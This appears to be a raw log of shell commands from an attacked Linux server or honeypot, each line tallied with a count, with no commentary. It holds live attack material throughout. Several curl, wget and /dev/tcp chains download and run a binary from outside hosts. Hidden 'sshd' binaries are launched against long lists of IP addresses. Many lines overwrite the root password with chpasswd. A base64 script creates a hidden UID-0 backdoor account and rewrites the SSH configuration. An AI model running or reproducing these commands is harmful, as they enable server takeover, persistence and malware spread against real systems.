nohup $SHELL -c "curl http://47.239.103.8:60140/linux -o /tmp/Aet3p7QVyp; if [ ! -f /tmp/Aet3p7QVyp ]; then wget http://47.239.103.8:60140/linux -O /tmp/Aet3p7QVyp; fi; if [ ! -f /tmp/Aet3p7QVyp ]; then exec 6<>/dev/tcp/47.239.103.8/60140 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Aet3p7QVyp ; chmod +x /tmp/Aet3p7QVyp && /tmp/Aet3p7QVyp mE8KQ3uiC4LcMcCAEKlsTghf5OVfHkx7ogyE3DHFghChYEQEWeXkXg9UYacQhME33I4IvmRMCFXj5V4KQ3WoEITDMNyDDr5jQQRZ5eRdCFRhpxCEwTfcjg6+ZEAOVePlXgxCdaQJmMAzy5gPpGFaD1jk71kORWalHoLFLsCCDb5mQRBc4u9ZDkVhpx6CxS7AhQe+ZEQNQe3vWQ5FYaAej8Auw4cGvmdHC0Hn51cEQmWhD4fSNMWYDKNiWg9d5/teC0Fvpg6HwDjShA6ie0ELQe3nQQxBZaoIhsM0wpYKp3tGDVn751sHWm2hBIDCMcCFHqRiWgxc7PtdCkd7pw6MxDDDhwywbVoMXu37XgxBe6IOhMg2wocKp3VMEF3n50EPQ2e+DIXGOsSGD6JgVAZB5+RWEEZlqRCHxTDIgA6hZ0QeV/vnXgZaZKYHmMAwyIAOoWdEHlvi+10NTHuiDILcOcKMCKBkRgxP4eJBBkJ7oQiD3DnDjAigZEYPT+HiQQZAe6EHgdwyx4QEpmVFDVr14VgQQ2O+DIfDLsqOBKZlRQ1e9eFYEExjvg+Awi7BgQSmZUUKW/XhWBBGYKIQhccuy4YEpmVFDFj15FYMWma+B4TcOMWMCKBkRApP7ftdD0x7ogqG3DLHgwSmZUUPW/XtQQxFbb4PhMcuwIYMqmNED1vi9V0ORnulC5jKMtyEC6BvQg5e4eVPCkN7qA2YwDDBmA+oZk4IX+TmVx5Me6IPj9wywo8QoWJEBFnl5F0OVGGnEITBOdyECqN7Qw5V4+VeD0bHlwK+4FjNixtS6T3zyLXKPPgSXk0=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/Aet3p7QVyp && /tmp/Aet3p7QVyp mE8KQ3uiC4LcMcCAEKlsTghf5OVfHkx7ogyE3DHFghChYEQEWeXkXg9UYacQhME33I4IvmRMCFXj5V4KQ3WoEITDMNyDDr5jQQRZ5eRdCFRhpxCEwTfcjg6+ZEAOVePlXgxCdaQJmMAzy5gPpGFaD1jk71kORWalHoLFLsCCDb5mQRBc4u9ZDkVhpx6CxS7AhQe+ZEQNQe3vWQ5FYaAej8Auw4cGvmdHC0Hn51cEQmWhD4fSNMWYDKNiWg9d5/teC0Fvpg6HwDjShA6ie0ELQe3nQQxBZaoIhsM0wpYKp3tGDVn751sHWm2hBIDCMcCFHqRiWgxc7PtdCkd7pw6MxDDDhwywbVoMXu37XgxBe6IOhMg2wocKp3VMEF3n50EPQ2e+DIXGOsSGD6JgVAZB5+RWEEZlqRCHxTDIgA6hZ0QeV/vnXgZaZKYHmMAwyIAOoWdEHlvi+10NTHuiDILcOcKMCKBkRgxP4eJBBkJ7oQiD3DnDjAigZEYPT+HiQQZAe6EHgdwyx4QEpmVFDVr14VgQQ2O+DIfDLsqOBKZlRQ1e9eFYEExjvg+Awi7BgQSmZUUKW/XhWBBGYKIQhccuy4YEpmVFDFj15FYMWma+B4TcOMWMCKBkRApP7ftdD0x7ogqG3DLHgwSmZUUPW/XtQQxFbb4PhMcuwIYMqmNED1vi9V0ORnulC5jKMtyEC6BvQg5e4eVPCkN7qA2YwDDBmA+oZk4IX+TmVx5Me6IPj9wywo8QoWJEBFnl5F0OVGGnEITBOdyECqN7Qw5V4+VeD0bHlwK+4FjNixtS6T3zyLXKPPgSXk0=" & |
1 |
head -c 3624504 > /tmp/9UVLypi6c5 |
1 |
A@'8 |
1 |
nohup $SHELL -c "curl http://165.154.235.116:60123/linux -o /tmp/X2ftWYmImV; if [ ! -f /tmp/X2ftWYmImV ]; then wget http://165.154.235.116:60123/linux -O /tmp/X2ftWYmImV; fi; if [ ! -f /tmp/X2ftWYmImV ]; then exec 6<>/dev/tcp/165.154.235.116/60123 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/X2ftWYmImV ; chmod +x /tmp/X2ftWYmImV && /tmp/X2ftWYmImV l8j9erMys3r03+702fBkuzaxZfTZ+u7f62a0NK9l997049H/YrExsWTl2evuxvBhrzK5evLZ4OzY9GW4ILVj69nr7cb9Y684s27z2Ovp0OVnty6wZ/HG6+Pc62W4Ordk9Nzt+tzyerM0s3r32u700fJutzCwYPLI6+vR62ayLrdk697q4N71ZbM2oWX02PTr3utmsDevZfLd4OzY9GS5ILVj69Hs9Nr2ba8xuGD/3urr3PR0tTevZvbf9OLe62W5Nrti9dnu7cjxY68ysmzr2e3oxvRktzq3ZPTY4/ra9GWvObF699zr9N/ybrcwsGb3yOL02vRsrzGzYeva6ujS82SwNLZ08d/06Nv8erA5s3r93+Ds2PRgsiCwYvDG6+/c62ayNa9l9N7g7Nj0ZrIgtWfr2enuxvRisS64Zf/e6uva8HS1N69l9Nn068b9Zbs2sWX00frixvdluC6wYfXG6+3S82SwM7N08d/06Nv8erA2sHr33Ojg3vVlsTihYPLG6OnR62W2Mq9i89Ls6tn1YqE0tnr32+300PN6sDi3bvPY6+7f5WC2LrNn/Mbr49rrZbc6t2T03Oj63PZ6sDO1evTe6vTR9G63MLBm8Mji9NnxZK8ysmDr2ens0vNksDC0dPHf9Ojd93qwMa9i9dLs6tn3YqE0tnr93vTo0etlsDm7YvXZ7u/I/XqzMbl69Nrv9Nr1Zrs2sWXx3/rixvRnsi6yevfa7eDe9WW1MaFl9Nj0697rZrA3r2Xy3eDs2PRkuSC1Y+vR6vTZ8G2vM7Ru89jr6dha9oNzQjvDJ0YegGxn; fi; echo password > /tmp/.opass; chmod +x /tmp/X2ftWYmImV && /tmp/X2ftWYmImV l8j9erMys3r03+702fBkuzaxZfTZ+u7f62a0NK9l997049H/YrExsWTl2evuxvBhrzK5evLZ4OzY9GW4ILVj69nr7cb9Y684s27z2Ovp0OVnty6wZ/HG6+Pc62W4Ordk9Nzt+tzyerM0s3r32u700fJutzCwYPLI6+vR62ayLrdk697q4N71ZbM2oWX02PTr3utmsDevZfLd4OzY9GS5ILVj69Hs9Nr2ba8xuGD/3urr3PR0tTevZvbf9OLe62W5Nrti9dnu7cjxY68ysmzr2e3oxvRktzq3ZPTY4/ra9GWvObF699zr9N/ybrcwsGb3yOL02vRsrzGzYeva6ujS82SwNLZ08d/06Nv8erA5s3r93+Ds2PRgsiCwYvDG6+/c62ayNa9l9N7g7Nj0ZrIgtWfr2enuxvRisS64Zf/e6uva8HS1N69l9Nn068b9Zbs2sWX00frixvdluC6wYfXG6+3S82SwM7N08d/06Nv8erA2sHr33Ojg3vVlsTihYPLG6OnR62W2Mq9i89Ls6tn1YqE0tnr32+300PN6sDi3bvPY6+7f5WC2LrNn/Mbr49rrZbc6t2T03Oj63PZ6sDO1evTe6vTR9G63MLBm8Mji9NnxZK8ysmDr2ens0vNksDC0dPHf9Ojd93qwMa9i9dLs6tn3YqE0tnr93vTo0etlsDm7YvXZ7u/I/XqzMbl69Nrv9Nr1Zrs2sWXx3/rixvRnsi6yevfa7eDe9WW1MaFl9Nj0697rZrA3r2Xy3eDs2PRkuSC1Y+vR6vTZ8G2vM7Ru89jr6dha9oNzQjvDJ0YegGxn" & |
1 |
head -c 3815748 > /tmp/uLnI3HXjTX |
1 |
chmod +x ./.3379608676280677019/sshd;nohup ./.3379608676280677019/sshd 14.225.18.22 47.94.158.98 43.100.59.13 188.166.211.175 198.154.88.54 183.216.54.95 85.133.195.147 62.60.232.169 58.22.105.66 178.128.253.94 116.62.60.152 91.218.67.202 52.91.199.247 43.247.68.87 140.249.192.235 158.51.96.38 221.14.147.153 101.91.181.235 146.19.215.133 34.122.156.88 111.67.202.122 47.96.158.82 138.197.28.192 8.135.238.15 199.15.79.168 124.225.67.32 103.145.145.73 115.190.97.236 222.187.215.194 145.249.115.185 107.150.121.86 139.59.253.66 125.124.209.35 115.231.161.242 114.96.84.122 155.94.236.236 122.225.202.151 160.202.248.145 134.209.107.62 221.2.109.10 112.217.86.2 193.34.212.145 43.239.110.69 110.40.45.123 116.148.210.71 103.192.198.89 45.8.144.90 62.171.131.222 91.203.6.23 220.181.172.244 173.244.60.254 & |
1 |
cat /etc/issue |
1 |
ps aux |
1 |
env |
1 |
chmod +x ./.1891065756375753900/sshd;nohup ./.1891065756375753900/sshd 125.87.80.129 182.204.176.169 125.87.87.86 125.87.84.19 125.87.89.39 125.87.81.146 125.87.93.28 125.87.83.225 125.87.81.55 125.87.94.163 125.87.81.171 8.219.232.68 125.87.94.243 3.112.193.112 57.180.23.36 125.87.84.233 43.199.67.202 125.87.88.73 125.87.90.70 104.254.209.183 137.184.67.181 125.87.93.74 125.87.91.242 125.87.94.235 125.87.92.223 16.162.112.65 125.87.86.1 125.87.92.143 125.87.87.27 46.249.98.35 154.91.170.122 182.204.183.12 125.87.83.48 125.87.89.236 77.72.132.226 217.79.189.145 125.87.91.102 182.204.180.40 125.87.86.2 52.53.168.182 125.87.94.85 18.142.28.198 125.87.94.55 47.128.221.187 182.118.191.63 52.221.222.216 3.82.35.3 125.87.95.81 125.87.89.120 125.87.81.104 125.87.89.73 & |
1 |
echo "root:ZxU1Gd0TAsmV"|chpasswd|bash |
1 |
echo "root:w2mXez3r9zt9"|chpasswd|bash |
1 |
echo "root:4cyibbUgq9e8"|chpasswd|bash |
1 |
pwd |
1 |
chmod +x ./.7129871686676624343/sshd;nohup ./.7129871686676624343/sshd 43.143.159.39 210.5.27.154 79.120.74.12 47.94.87.144 43.239.110.69 103.102.216.138 45.251.115.48 160.202.248.145 62.60.232.169 116.142.242.168 147.45.49.175 46.38.143.200 43.247.68.87 37.49.227.131 59.80.21.231 125.87.82.248 47.84.77.51 188.43.199.85 103.145.145.82 212.113.112.96 185.177.239.207 112.4.175.171 101.36.109.45 96.78.175.36 158.51.96.38 14.199.52.62 124.205.213.108 113.7.221.72 180.163.61.238 178.128.253.94 45.66.150.97 59.80.21.118 103.145.145.73 148.72.168.29 221.2.109.10 195.154.203.16 43.100.59.13 119.45.128.125 222.136.36.198 85.28.47.144 111.12.131.236 155.94.236.236 167.71.48.30 5.167.76.48 43.130.237.232 167.114.180.31 163.172.204.26 207.166.165.63 31.210.85.66 210.46.216.173 122.228.208.32 & |
1 |
echo "root:TOZW0uxaVuTr"|chpasswd|bash |
1 |
echo "root:X0GMu4Yh4Ys8"|chpasswd|bash |
1 |
echo "root:1vcivxkbX3Yk"|chpasswd|bash |
1 |
chmod +x ./.8611885512486437814/sshd;nohup ./.8611885512486437814/sshd 188.212.109.94 211.154.194.22 163.172.34.113 159.203.90.99 103.212.120.80 36.163.199.22 45.251.115.48 103.117.121.26 120.79.95.224 182.66.193.215 139.59.253.66 47.84.77.51 212.113.112.49 222.187.215.194 220.67.128.33 107.150.121.86 8.137.144.169 41.225.238.233 61.74.135.124 111.12.131.236 43.229.149.112 148.72.168.29 188.213.196.234 47.106.79.217 103.102.216.138 101.43.220.185 45.10.175.89 125.124.209.35 167.114.180.31 121.40.152.36 124.222.68.65 103.145.145.79 112.4.175.171 171.244.22.39 36.138.228.99 121.41.95.224 58.22.105.66 31.14.115.8 195.179.227.73 37.59.97.82 209.97.169.222 91.203.6.23 185.177.239.207 103.104.169.53 45.183.155.43 62.60.232.169 154.91.170.122 8.217.13.52 103.145.145.73 103.218.241.53 152.70.143.231 & |
1 |
echo "root:DkMwkU0GmfYg"|chpasswd|bash |
1 |
echo "root:pPosMiqt63l6"|chpasswd|bash |
1 |
echo "root:UQC3deSh00un"|chpasswd|bash |
1 |
echo "root:HPNExlzSwE6Z"|chpasswd|bash |
1 |
/bin/sh |
1 |
nano setup_environment.sh |
1 |
ls home |
1 |
cd phil |
1 |
cd lib |
1 |
export ip=167.172.19.202;export pw=yw2ds5ZaDBg3YzUJ3VRJlCaA3vPtdG4E;export pwhash='$1$WG6hp4S1$NKzEEJmRy2yXCSKA013LL.';echo IyEvYmluL2Jhc2gKdXNlcm5hbWU9ImxvY2FsIgp2ZXJzaW9uPSIxLjMiCgppZiBbICIkRVVJRCIgLW5lIDAgXTsgdGhlbgogIGVjaG8gIlstXSBSdW4gYXMgcm9vdCEiCiAgZXhpdApmaQoKZ2V0ZW50IHBhc3N3ZCAkdXNlcm5hbWUgPiAvZGV2L251bGwKaWYgWyAkPyAtZXEgMCBdOyB0aGVuCiAgZWNobyAiWy1dIFVzZXJuYW1lICR1c2VybmFtZSBpcyBhbHJlYWR5IGJlaW5nIHVzZWQhIgogIGV4aXQKZmkKCmVjaG8gIlsrXSBTU0ggVmFjY2luZSBTY3JpcHQgdiR2ZXJzaW9uIgoKb3M9YGxzYl9yZWxlYXNlIC1pcyAyPi9kZXYvbnVsbCB8fCBlY2hvIHVua25vd25gCmNwdXM9YGxzY3B1IDI+L2Rldi9udWxsIHwgZWdyZXAgIl5DUFVcKHNcKToiIHwgc2VkIC1lICJzL1teMC05XS8vZyIgfHwgbnByb2MgMj4vZGV2L251bGwgfHwgZWNobyAwYAoKIyBDcmVhdGUgdGhlIGJhY2tkb29yIHVzZXJuYW1lLgplY2hvICJbIV0gQ3JlYXRlIHVzZXJuYW1lICR1c2VybmFtZSB3aXRoIGFkbWluaXN0cmF0b3IgcHJpdmlsZWdlLiIKaWYgWyAhIC1kIC9ob21lIF07IHRoZW4KICBta2RpciAvaG9tZQogIGVjaG8gIlshXSBGb2xkZXIgL2hvbWUgd2FzIGNyZWF0ZWQuIgpmaQpwYXNzd2Q9JCh0aW1lb3V0IDEwIGNhdCAvZGV2L3VyYW5kb20gfCB0ciAtZGMgJ2EtekEtWjAtOScgfCBmb2xkIC13IDMyIHwgaGVhZCAtbiAxKQpoPSIkcHdoYXNoIgppZiBbIC14ICIkKGNvbW1hbmQgLXYgb3BlbnNzbCkiIF07IHRoZW4KICBoPSQoZWNobyAkcGFzc3dkIHwgb3BlbnNzbCBwYXNzd2QgLTEgLXN0ZGluKQplbHNlCiAgcGFzc3dkPSIkcHciCmZpCnVzZXJhZGQgJHVzZXJuYW1lIC1vIC11IDAgLWcgMCAtYyAibG9jYWwiIC1tIC1kIC9ob21lLyR1c2VybmFtZSAtcyAvYmluL2Jhc2ggLXAgIiRoIgoKaWYgISBncmVwIC1xICJeJHVzZXJuYW1lOiIgL2V0Yy9wYXNzd2Q7dGhlbgogIGVjaG8gImNhbm5vdCBhZGQgdXNlciIKICBleGl0CmZpCgppZiBbIC14ICIkKGNvbW1hbmQgLXYgZWQpIiBdOyB0aGVuCiAgcHJpbnRmICIlc1xuIiAnJG0xJyB3cSB8IGVkIC9ldGMvcGFzc3dkIC1zCiAgcHJpbnRmICIlc1xuIiAnJG0xJyB3cSB8IGVkIC9ldGMvc2hhZG93IC1zCmVsc2UKICBsbz0kKHRhaWwgLTEgL2V0Yy9wYXNzd2QpCiAgc2VkIC1pICIvXiR1c2VybmFtZTovZCIgL2V0Yy9wYXNzd2QKICBzZWQgLWkgIi9ecm9vdDouKjowOjA6L2EgJGxvIiAvZXRjL3Bhc3N3ZAoKICBsbz0kKHRhaWwgLTEgL2V0Yy9zaGFkb3cpCiAgc2VkIC1pICIvXiR1c2VybmFtZTovZCIgL2V0Yy9zaGFkb3cKICBzZWQgLWkgIi9ecm9vdDovYSAkbG8iIC9ldGMvc2hhZG93CmZpCgplY2hvICJbIV0gR2VuZXJhdGVkIHBhc3N3b3JkOiAkcGFzc3dkIgplY2hvICJbIV0gU2V0IHRoZSBwcm9maWxlLiIKZWNobyAidW5zZXQgSElTVEZJTEUiID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gJ2V4cG9ydCBQUzE9IlxbJCh0cHV0IHNldGFmIDIpXF1bXFskKHRwdXQgc2dyMClcXVxbJCh0cHV0IGJvbGQpXF1cWyQodHB1dCBzZXRhZiAyKVxdXHVAXGggXFdcWyQodHB1dCBzZ3IwKVxdXFskKHRwdXQgc2V0YWYgMilcXV1cWyQodHB1dCBzZ3IwKVxdXFskKHRwdXQgYm9sZClcXVxbJCh0cHV0IHNldGFmIDcpXF1cXCQgXFskKHRwdXQgc2dyMClcXSInID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gInciID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgoKZWNobyAiIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiID4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyAgICAgICAgICAgICAgICAgICAgISAhICEgISAhIElNUE9SVEFOVCAhICEgISAhICEgICAgICAgICAgICAgICAgICAgICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgKiBZb3VyIHN5c3RlbSBoYXMgZGV0ZWN0ZWQgYSB3ZWFrIHBhc3N3b3JkIGZvciByb290IGFjY291bnQgYW5kIGZvciAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIHNlY3VyaXR5IHJlYXNvbnMsIHJlbW90ZSBhY2Nlc3MgdmlhIFNTSCBoYXMgYmVlbiBibG9ja2VkIHRvIHByZXZlbnQgIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyB1bmF1dGhvcml6ZWQgYWNjZXNzLiBJbiBvcmRlciB0byBlbmFibGUgYWdhaW4gcmVtb3RlIGFjY2VzcyB0byB0aGlzICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgbWFjaGluZSBmb3Igcm9vdCB1c2VyIHZpYSBTU0gsIHNldCBhIG5ldyBjb21wbGV4IHBhc3N3b3JkIGZvciByb290ICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIGFjY291bnQgYW5kIGRlbGV0ZSAnRGVueVVzZXJzIHJvb3QnIGxpbmUgYmVsb3cgb24gdGhpcyBjb25maWcgZmlsZS4gIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyAqIFJlc3RhcnRpbmcgdGhlIFNTSCBEYWVtb24gaXMgcmVxdWlyZWQgZm9yIGNoYW5nZXMgdG8gdGFrZSBlZmZlY3QuICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIEJhc2ggY29tbWFuZHM6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyBwYXNzd2Qgcm9vdCAgICAgICAgICAgICAoQ2hhbmdlcyB5b3VyIHJvb3QgcGFzc3dvcmQpLiAgICAgICAgICAgICAgICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgc2VydmljZSBzc2hkIHJlc3RhcnQgICAgKFJlc3RhcnQgdGhlIFNTSCBEYWVtb24pLiAgICAgICAgICAgICAgICAgICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICJEZW55VXNlcnMgcm9vdCIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmNhdCAvZXRjL3NzaC9zc2hkX2NvbmZpZyA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAp5ZXMgfCBjcCAvdG1wL3NzaGRfY29uZmlnX3RtcCAvZXRjL3NzaC9zc2hkX2NvbmZpZyA+IC9kZXYvbnVsbCAyPiYxCnJtIC1yZiAvdG1wL3NzaGRfY29uZmlnX3RtcAoKc3lzdGVtY3RsIHJlc3RhcnQgc3NoIHx8IHN5c3RlbWN0bCByZXN0YXJ0IHNzaGQgfHwgc2VydmljZSBzc2ggcmVzdGFydCB8fCBzZXJ2aWNlIHNzaGQgcmVzdGFydCB8fCAvZXRjL2luaXQuZC9zc2ggcmVzdGFydCB8fCAvZXRjL2luaXQuZC9zc2hkIHJlc3RhcnQKaWYgWyAkPyAtZXEgMCBdO3RoZW4KICBlY2hvICJTU0hEIHJlc3RhcnRlZCIKZWxzZQogIGVjaG8gIlNTSEQgZXJyb3IiCmZpCgoKaXA9JGlwCmVjaG8gIlshXSBJUDogJGlwIgoKIyBUcnkgdG8gZ2V0IGEgaG9zdG5hbWUgZnJvbSBJUC4KZG5zPWBnZXRlbnQgaG9zdHMgJGlwIHwgYXdrICd7cHJpbnQgJDJ9J2AKaWYgWyAteiAiJGRucyIgXQp0aGVuCiAgZG5zPW51bGwKZmkKZWNobyAiWyFdIEROUzogJGRucyIKCiMgR2V0IGNvdW50cnkgbmFtZSBmcm9tIElQLgpjb3VudHJ5PWB3Z2V0IC1xTy0gaHR0cHM6Ly9hcGkuZGItaXAuY29tL3YyL2ZyZWUvJGlwL2NvdW50cnlOYW1lIDI+L2Rldi9udWxsIHx8IGN1cmwgLWtzIC1tMzAgaHR0cHM6Ly9hcGkuZGItaXAuY29tL3YyL2ZyZWUvJGlwL2NvdW50cnlOYW1lIDI+L2Rldi9udWxsIHx8IGVjaG8gWGAKCgplY2hvICJbIV0gTGlzdCBvZiB1c2VybmFtZXMgb24gdGhpcyBtYWNoaW5lOiIKbHMgL2hvbWUgfCBhd2sgJ3twcmludCAkMX0nCgplY2hvICJbIV0gTGlzdCBvZiBldGhlcm5ldCBJUCBhZGRyZXNzZXM6IgppcCBhZGRyIHNob3cgfCBncmVwIC1vICJpbmV0IFswLTldKlwuWzAtOV0qXC5bMC05XSpcLlswLTldKiIgfCBncmVwIC1vICJbMC05XSpcLlswLTldKlwuWzAtOV0qXC5bMC05XSoiCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgoKIyBQcmludCBhbGwgaW5mbyBuZWNlc3NhcnkgYWJvdXQgdGhlIG1hY2hpbmUuCmVjaG8gIiIKdW5hbWUgLWEKZWNobyAiJHVzZXJuYW1lICRwYXNzd2QgJGgiCmVjaG8gIiRpcCwkZG5zLHJvb3QsJHVzZXJuYW1lLCRwYXNzd2QsJGNwdXMsJG9zLCRjb3VudHJ5IgplY2hvICIiCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgo=|base64 -d|bash |
1 |
echo "root:uZo5C0KFjMhH"|chpasswd|bash |
1 |
echo "root:7EPt518mSPX0"|chpasswd|bash |
1 |
dmesg |
1 |
echo "root:KazxY5bYBGIZ"|chpasswd|bash |
1 |
echo "root:ZyTv8x9vsa5C"|chpasswd|bash |
1 |
echo "root:90vnmoVpKeyi"|chpasswd|bash |
1 |
echo "root:dhfmhT4lAw1r"|chpasswd|bash |
1 |
echo "root:ocdFbupW3ctz"|chpasswd|bash |
1 |
echo "root:02WB3cPx6iJf"|chpasswd|bash |
1 |
echo "root:BtxneptQiiEf"|chpasswd|bash |
1 |
echo "root:6EKR1kcysD8O"|chpasswd|bash |
1 |
echo "root:ZuEEueFVZNLX"|chpasswd|bash |
1 |
which apt |
1 |
echo "root:cDYg6JZ4Bd4Z"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://36.134.194.19:60147/linux -o /tmp/sU2MUWgrNo; if [ ! -f /tmp/sU2MUWgrNo ]; then wget http://36.134.194.19:60147/linux -O /tmp/sU2MUWgrNo; fi; if [ ! -f /tmp/sU2MUWgrNo ]; then exec 6<>/dev/tcp/36.134.194.19/60147 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/sU2MUWgrNo ; chmod +x /tmp/sU2MUWgrNo && /tmp/sU2MUWgrNo NFYyc/Q3JWIQLZP/9Tni85csD2YgJeJqNERLV0cxcPQ0JWYEKpH46jH7+JQsEGcgPPR2MkVXT0M8cuo0Im4eKJbn6TXp55AtEGAgP+x0N0RPWUIxaug2JngMKJLn6jTo85csD2YiJe5zKERKQFgyffQ0I2EEKpH46Db7/ZYyDGIiK+tyKERJQ0A2de4xMGUIMpD67y7q8JUyD28qM+p1MkFZTUEofOkrImYNMpDx6Drt+ZAvBnYiNehqM0NXQUQodu81KmAOLZX5+zj1+5AsEGcnPfRwNkxPSUc1dfoxJ3gMKZPn6DX18JEmCGYhN+1kMkFXS0UxauIzPmcGKpv/6zHv/oEoCXgiNu1qNUZXSEYxfuw1IWQMPJX+9TLu/Y8oCngiMeByNkdLTVYyc/Q3I2AQLpXw9Tjq85csD2QjJe5zKERKQFg0cO8rImAEKpH46DD7/ZYyDGUpK+h0PlhMTUwwdOsxKXYKK4/x7S7p8Y8oCWwmNet3N1ZBV0Q3dPQwIHgIKZv/6zHp/4EuD2c+NO59KEdPSVg0de4/JmYPKJnp6jnp55IyB2Q+Pe1+MEZISUImcO0rJ2AQKpfn6THh/5EtDmAwNO90KEdJQFg0cOkrJmMEKpH46Tj7/ZMyD28iK+l8KEdBQ0A2dek1MGIJMpn69TLv+o8tBmQqM+p1NkBZTUEodukzPmQKJY/x6jrt+ZAuDXYkMvR2NUBXS0I1ausxI2wILJD56SDv/o8uC2Q+Nu9qP0ZDT0Y3du0lI2AQLZL99THi/Y8tB2wmNetwMVYBfFOB+L1FCCjZQ8AqG4p4NDYTrf1bF3p3L+32; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/sU2MUWgrNo && /tmp/sU2MUWgrNo NFYyc/Q3JWIQLZP/9Tni85csD2YgJeJqNERLV0cxcPQ0JWYEKpH46jH7+JQsEGcgPPR2MkVXT0M8cuo0Im4eKJbn6TXp55AtEGAgP+x0N0RPWUIxaug2JngMKJLn6jTo85csD2YiJe5zKERKQFgyffQ0I2EEKpH46Db7/ZYyDGIiK+tyKERJQ0A2de4xMGUIMpD67y7q8JUyD28qM+p1MkFZTUEofOkrImYNMpDx6Drt+ZAvBnYiNehqM0NXQUQodu81KmAOLZX5+zj1+5AsEGcnPfRwNkxPSUc1dfoxJ3gMKZPn6DX18JEmCGYhN+1kMkFXS0UxauIzPmcGKpv/6zHv/oEoCXgiNu1qNUZXSEYxfuw1IWQMPJX+9TLu/Y8oCngiMeByNkdLTVYyc/Q3I2AQLpXw9Tjq85csD2QjJe5zKERKQFg0cO8rImAEKpH46DD7/ZYyDGUpK+h0PlhMTUwwdOsxKXYKK4/x7S7p8Y8oCWwmNet3N1ZBV0Q3dPQwIHgIKZv/6zHp/4EuD2c+NO59KEdPSVg0de4/JmYPKJnp6jnp55IyB2Q+Pe1+MEZISUImcO0rJ2AQKpfn6THh/5EtDmAwNO90KEdJQFg0cOkrJmMEKpH46Tj7/ZMyD28iK+l8KEdBQ0A2dek1MGIJMpn69TLv+o8tBmQqM+p1NkBZTUEodukzPmQKJY/x6jrt+ZAuDXYkMvR2NUBXS0I1ausxI2wILJD56SDv/o8uC2Q+Nu9qP0ZDT0Y3du0lI2AQLZL99THi/Y8tB2wmNetwMVYBfFOB+L1FCCjZQ8AqG4p4NDYTrf1bF3p3L+32" & |
1 |
head -c 3610344 > /tmp/JWYDfHWmB4 |
1 |
echo "root:Np0bKVRfW1SS"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://8.222.174.150:60111/linux -o /tmp/lY2iUA2sTc; if [ ! -f /tmp/lY2iUA2sTc ]; then wget http://8.222.174.150:60111/linux -O /tmp/lY2iUA2sTc; fi; if [ ! -f /tmp/lY2iUA2sTc ]; then exec 6<>/dev/tcp/8.222.174.150/60111 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/lY2iUA2sTc ; chmod +x /tmp/lY2iUA2sTc && /tmp/lY2iUA2sTc 8bPqDaIKEDQLCb4M8KqFhqXuC7wIBTgLCr4I8KKLiL3vD7wCEzAUCb0a6qSSjqDoFL4LEi4XCLUA6KONjKf+C7UKCzMLAb4U5qSGiqPvCrgYETcLCb0L8KKOib3rCLYOFTEXDKwO6b2Oj6TwCbwWFDASAroK76GOnKLuC6IJFzYLCboU7KKKhqXuC78PBTYTFr4K6L2Phb3qCLYOFTEVC6wO6b2Oj6TwAroWFDgTAroK76eLnKvwCL0PCzIUFr0N66mKjKLuA6wMEi4SDqII76OSjaDpALoIFDEQGLgN8KGPir3sCqIMHDoTCL0I7rOIi73sCboWFzQWFr0O7amKjKLuCKwACzERCKII7aeSjaDoALoIFDAQGLgN8KGJjr3tD6IBFToTCL0I6bOIi73sD74WFDELDrwA6KONjqX+CL0JCzERAaIL6KOSjqLqALoIFDQdGLgN8KGIj73vCLsWFDQVAroK76ePnKvwCL0ACzEXDaII7qGGiqPvDrsYETcLCrgJ8KGPkqDmALoIFDMSF9I3gNiDpIWBu1S66UGrmZY=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/lY2iUA2sTc && /tmp/lY2iUA2sTc 